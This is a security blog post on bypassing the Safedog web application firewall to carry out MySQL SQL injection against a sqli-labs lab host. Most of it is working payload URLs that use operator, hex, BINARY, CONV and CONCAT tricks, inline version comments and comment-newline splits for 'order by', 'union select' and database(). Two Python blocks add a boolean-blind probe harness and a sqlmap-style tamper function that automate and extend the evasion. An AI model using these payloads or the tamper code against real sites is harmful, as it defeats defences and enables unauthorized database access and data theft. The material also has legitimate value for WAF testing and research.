Bypass MySQL Safedog
2019-10-19 11:20:02 Author: xz.aliyun.com Reads: 209

Pwning Safedog together with my teammates.

Safedog blocks a basic (comparison or arithmetic) operator followed by a digit string, so the textbook probes 'and 1=1' / 'and 1=2' are caught: the '=' is followed directly by a number. Every bypass below keeps a non-digit token (a sign, '~', a '0x' prefix, a keyword or a function call) between the operator and the number, and each pair gives one condition that MySQL evaluates as true and one as false, which is all a boolean-based blind probe needs. In the examples, "normal" means the page renders exactly as for the untampered request (condition true) and "abnormal" means it does not (condition false); the target is an internal lab host whose path matches sqli-labs Less-1.

Bypass with unary operators ('-' is unary minus, '~' is bitwise NOT)

http://172.16.1.157/sql/Less-1/?id=1'and -1=-1 -- + normal
http://172.16.1.157/sql/Less-1/?id=1'and -1=-2 -- + abnormal
http://172.16.1.157/sql/Less-1/?id=1'and ~1=~1 -- + normal
http://172.16.1.157/sql/Less-1/?id=1'and ~1=~2 -- + abnormal

Bypass with hex literals ('<>' is not-equal, '<=>' is the NULL-safe equal, 'xor' is logical exclusive or)

http://172.16.1.157/sql/Less-1/?id=1' and 0x0 <> 0x1-- +    normal
http://172.16.1.157/sql/Less-1/?id=1' and 0x0 <> 0x0-- +    abnormal
http://172.16.1.157/sql/Less-1/?id=1' and 0x0 <=> 0x0-- +   normal
http://172.16.1.157/sql/Less-1/?id=1' and 0x0 <=> 0x1-- +   abnormal
http://172.16.1.157/sql/Less-1/?id=1' and 0x0 xor 0x1-- +   normal
http://172.16.1.157/sql/Less-1/?id=1' and 0x0 xor 0x0-- +   abnormal

Bypass with BINARY (no comparison operator at all: BINARY 1 is the binary string '1', which is truthy in a WHERE clause, BINARY 0 is '0', which is falsy)

http://172.16.1.157/sql/Less-1/?id=1' and BINARY 1-- +  normal
http://172.16.1.157/sql/Less-1/?id=1' and BINARY 0-- +  abnormal

Bypass with the CONV() function (CONV(1,11,2) converts 1 from base 11 to base 2 and returns the string '1', CONV(0,11,2) returns '0'; the bases are arbitrary)

http://172.16.1.157/sql/Less-1/?id=1' and CONV(1,11,2)-- +  normal
http://172.16.1.157/sql/Less-1/?id=1' and CONV(0,11,2)-- +  abnormal

Bypass with the CONCAT() function (CONCAT(1) returns the string '1', CONCAT(0) returns '0'; the same truthy/falsy trick through a function call)

http://172.16.1.157/sql/Less-1/?id=1' and CONCAT(1)-- +     normal
http://172.16.1.157/sql/Less-1/?id=1' and CONCAT(0)-- +     abnormal
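To turn the primitives above into something reusable, here is an added Python example (my own code, not from the original post): it builds the true/false probe pair for each bypass from a base URL and parameter name, and a small harness that, given any HTTP fetch function you supply, reports which pairs both get past the WAF and flip the page. The lab host, the parameter name and the fetch function are assumptions; the conditions are exactly the ones from the payloads above.

```python
from urllib.parse import quote

# Each entry is (name, condition true in MySQL, condition false in MySQL), taken
# from the payloads above. None of them puts a digit straight after a basic
# comparison operator, which is the pattern Safedog matches on "and 1=1".
PRIMITIVES = [
    ("negative",     "-1=-1",        "-1=-2"),
    ("bitwise-not",  "~1=~1",        "~1=~2"),
    ("hex-ne",       "0x0 <> 0x1",   "0x0 <> 0x0"),
    ("hex-nullsafe", "0x0 <=> 0x0",  "0x0 <=> 0x1"),
    ("hex-xor",      "0x0 xor 0x1",  "0x0 xor 0x0"),
    ("binary",       "BINARY 1",     "BINARY 0"),
    ("conv",         "CONV(1,11,2)", "CONV(0,11,2)"),
    ("concat",       "CONCAT(1)",    "CONCAT(0)"),
]


def inject(value, cond, quote_char="'", tail="-- +"):
    """Raw parameter value: close the string literal, append the condition and
    comment out the rest of the query. MySQL's "-- " comment needs a space after
    the dashes; the trailing "+" from the post keeps that space from being trimmed."""
    return f"{value}{quote_char} and {cond} {tail}"


def probe_url(base, param, raw):
    """Percent-encode the whole value (spaces as %20, '+' as %2B) so nothing is
    re-interpreted by the client or server on the way to the query."""
    return f"{base}?{param}={quote(raw, safe='')}"


def probe(fetch, base, param, value, primitives=PRIMITIVES):
    """Classify each primitive by comparing the true/false responses with the
    untampered page. fetch(url) -> response body is supplied by the caller."""
    baseline = fetch(probe_url(base, param, value))
    verdicts = {}
    for name, true_cond, false_cond in primitives:
        body_true = fetch(probe_url(base, param, inject(value, true_cond)))
        body_false = fetch(probe_url(base, param, inject(value, false_cond)))
        if body_true == baseline and body_false != baseline:
            verdicts[name] = "confirmed"    # passed the WAF and the condition is evaluated
        elif body_true == baseline:
            verdicts[name] = "no-effect"    # condition ignored: not injectable this way
        elif body_false == baseline:
            verdicts[name] = "inverted"     # page logic is reversed; still injectable
        else:
            verdicts[name] = "both-differ"  # blocked by the WAF, or a SQL error on both
    return verdicts


if __name__ == "__main__":
    # Assumed lab target from the post; prints the URLs a browser would request.
    for name, true_cond, _ in PRIMITIVES:
        print(name, probe_url("http://172.16.1.157/sql/Less-1/", "id", inject("1", true_cond)))
```

Compare against a baseline rather than looking for a block page: a request the WAF drops, a SQL syntax error and a false condition all differ from the baseline, so only the pair (true equals baseline, false differs) counts as confirmed. On a real target with dynamic content, replace the whole-body comparison inside probe() with a length or marker-string check.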

Bypassing order by

Inline (version) comment

http://172.16.1.157/sql/Less-1/?id=1'/*!14440order by*/ 3 -- +

MySQL executes the contents of /*!NNNNN ... */ when its own version is at least N.NN.NN; 14440 (1.44.40) is satisfied by every server, while a WAF that treats /* ... */ as an ordinary comment never sees the keyword.

Comment plus newline

http://172.16.1.157/sql/Less-1/?id=1'order%23%0aby 3 -- +

%23 is '#', which starts a comment that runs to the end of the line, and %0a is the newline that ends it, so the server still reads "order by" while the WAF's keyword pattern no longer matches.

The key is to break up "union select"

Inline (version) comment

http://172.16.1.157/sql/Less-1/?id=-1' /*!14440union*//*!14440select */1,2,3 -- +

Comment followed by junk characters and a newline

http://172.16.1.157/sql/Less-1/?id=-1'union%23hhh%0aselect 1,2,3--+

union distinct | distinctrow | all

The optional set modifier between union and select is valid MySQL syntax (distinctrow is accepted as a synonym for distinct) and gives yet another way to separate the two keywords:

http://172.16.1.157/sql/Less-1/?id=-1' union distinct %23%0aselect 1,2,3 -- +
http://172.16.1.157/sql/Less-1/?id=-1' union distinctrow %23%0aselect 1,2,3 -- +
http://172.16.1.157/sql/Less-1/?id=-1' union all%23%0aselect 1,2,3 -- +

Next comes pulling data. Here I use the comment-plus-junk-plus-newline method (%23a%0a) for the bypass; the /*!14440 ... */ inline comment described above works just as well.

Querying the database name (note that the function call itself is split the same way: database%23%0a(%0a) reaches MySQL as "database", a comment, a newline and then "()", so the WAF's pattern for database() never matches)

http://172.16.1.157/sql/Less-1/?id=-1' union %23chabug%0a select 1,database%23%0a(%0a),3 -- +
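As an added example (my own code, written in the shape of a sqlmap tamper script, not code from the post, from Safedog or from sqlmap), the following Python rewrites the keywords these payloads target with the two techniques above, the /*!14440 ... */ version comment and the '#junk' plus newline split, and applies the same split to database() as in the payload above. It generalizes beyond the post by also handling the all/distinct/distinctrow modifier and user()/version()/schema(); the junk string, the function list and the regular expressions are my assumptions.

```python
import re
from urllib.parse import quote

# /*!NNNNN ... */ is a MySQL "version comment": the server executes its contents
# when its version is >= N.NN.NN, so 14440 (1.44.40) is satisfied by every server,
# while a WAF that treats /* */ as a plain comment never sees the keyword inside.
VERSION = "14440"


def inline(*words, version=VERSION):
    """Wrap each word in its own version comment: inline('union', 'select')."""
    return "".join(f"/*!{version}{w}*/" for w in words)


def junk_split(first, second, junk="hhh"):
    """Separate two keywords with a '#' comment and a newline; the newline ends
    the comment, so MySQL still reads 'first second'. junk is an assumed filler."""
    return f"{first}#{junk}\n{second}"


# Keyword patterns (assumed): union [all|distinct|distinctrow] select, order by,
# and zero-argument calls the post splits as database%23%0a(%0a).
UNION_SELECT = re.compile(r"\b(union)(\s+(?:all|distinct|distinctrow))?\s+(select)\b", re.I)
ORDER_BY = re.compile(r"\b(order)\s+(by)\b", re.I)
FUNC_CALL = re.compile(r"\b(database|user|version|schema)\(\)", re.I)


def tamper(payload, style="junk", **kwargs):
    """Rewrite the keywords Safedog matches. style='junk' uses '#junk\\n' splits,
    style='inline' uses version comments; zero-argument function calls are
    always split as 'name#\\n(\\n)', as in the database-name payload above."""
    if style == "inline":
        payload = UNION_SELECT.sub(lambda m: inline(m[1] + (m[2] or ""), m[3]), payload)
        payload = ORDER_BY.sub(lambda m: inline(f"{m[1]} {m[2]}"), payload)
    else:
        payload = UNION_SELECT.sub(lambda m: junk_split(m[1] + (m[2] or ""), m[3]), payload)
        payload = ORDER_BY.sub(lambda m: junk_split(m[1], m[2]), payload)
    payload = FUNC_CALL.sub(lambda m: f"{m[1]}#\n(\n)", payload)
    return payload


def encode(payload):
    """Percent-encode everything: '#' becomes %23 and the newline %0A (the post
    writes %0a; hex case does not matter to the server)."""
    return quote(payload, safe="")


if __name__ == "__main__":
    for raw in ("1' order by 3 -- +", "-1' union select 1,database(),3 -- +"):
        for style in ("junk", "inline"):
            print(style, repr(tamper(raw, style)), encode(tamper(raw, style)))
```

Dropped into sqlmap's tamper/ directory it would also need the usual __priority__ and dependencies() boilerplate; sqlmap calls tamper(payload, **kwargs), so style stays at its default there. Send the result through encode() or let the client percent-encode it, but the newline must reach MySQL as a real line break (which is why the post writes %0a): any proxy or framework that strips or normalises line breaks in query strings defeats the '#' variant while leaving the version-comment variant intact.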

Querying table names: with Safedog 4.0's default configuration, where information_schema protection is off, the same technique gets through; once information_schema protection is enabled I could not get past it, sadly.


Source: http://xz.aliyun.com/t/6545